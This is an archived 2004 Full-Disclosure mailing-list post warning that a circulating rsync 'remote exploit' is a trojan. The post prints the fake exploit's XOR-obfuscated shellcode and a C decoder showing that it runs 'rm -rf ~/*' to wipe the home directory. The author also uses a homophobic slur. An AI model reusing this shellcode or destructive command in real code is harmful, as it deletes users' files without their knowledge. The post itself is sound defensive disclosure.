[Full-Disclosure] rsynd-too-open.c posted on fd is backdoored. Don't run it!!!

From: DownBload / Illegal Instruction Labs (downbload_at_hotmail.com)
Date: 05/29/04

  • Next message: Etaoin Shrdlu: "Re: [Full-Disclosure] Printer Buffer Security??"
    To: full-disclosure@lists.netsys.com
    Date: Sat, 29 May 2004 15:24:09 +0200
    
    

    rsync <= 2.6.1 remote exploit posted to full disclosure list is a fake and
    malicious exploit.
    Don't run it!!!

    rsynd-too-open.c:
    ....
    void (*funct) ();
    ....
    (long) funct = &shellcode2;
    ....
    funct();
    ....

    "shellcode2" is a malicious asm code that will delete your home directory.
    Shellcode is encrypted with a simple XOR algorithm to obscure its main
    purpose.
    Whoever backdoored this exploit is 100% gaydiot (mix between gay and idiot
    :).
    I can understand people who backdoor exploits to hack machines, but placing
    backdoors that will delete user home dir is evil and plain stupid.

    [rot@laptop BACKDOOR]# gcc back.c
    [root@laptop BACKDOOR]# ./a.out
    % / b i n / s h s h - c r m - r f ~ / * 2 > / d e v / n u l l

    back.c
    ---cut here---
    char shellcode2[] =
    "\xeb\x10\x5e\x31\xc9\xb1\x4b\xb0\xff\x30\x06\xfe\xc8\x46\xe2\xf9"
    "\xeb\x05\xe8\xeb\xff\xff\xff\x17\xdb\xfd\xfc\xfb\xd5\x9b\x91\x99"
    "\xd9\x86\x9c\xf3\x81\x99\xf0\xc2\x8d\xed\x9e\x86\xca\xc4\x9a\x81"
    "\xc6\x9b\xcb\xc9\xc2\xd3\xde\xf0\xba\xb8\xaa\xf4\xb4\xac\xb4\xbb"
    "\xd6\x88\xe5\x13\x82\x5c\x8d\xc1\x9d\x40\x91\xc0\x99\x44\x95\xcf"
    "\x95\x4c\x2f\x4a\x23\xf0\x12\x0f\xb5\x70\x3c\x32\x79\x88\x78\xf7"
    "\x7b\x35";

    main (int argc, char **argv)
    {
            char *decrypt = shellcode2+23, key=0xff;
            int x;
            for (x=0;x<0x29;x++) {
                    printf ("%c ", *decrypt ^ key);
                    decrypt++;
                    key--;
            }

    }
    ---cut here---

    _________________________________________________________________
    Add photos to your e-mail with MSN 8. Get 2 months FREE*.
    http://join.msn.com/?page=features/featuredemail

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html


  • Next message: Etaoin Shrdlu: "Re: [Full-Disclosure] Printer Buffer Security??"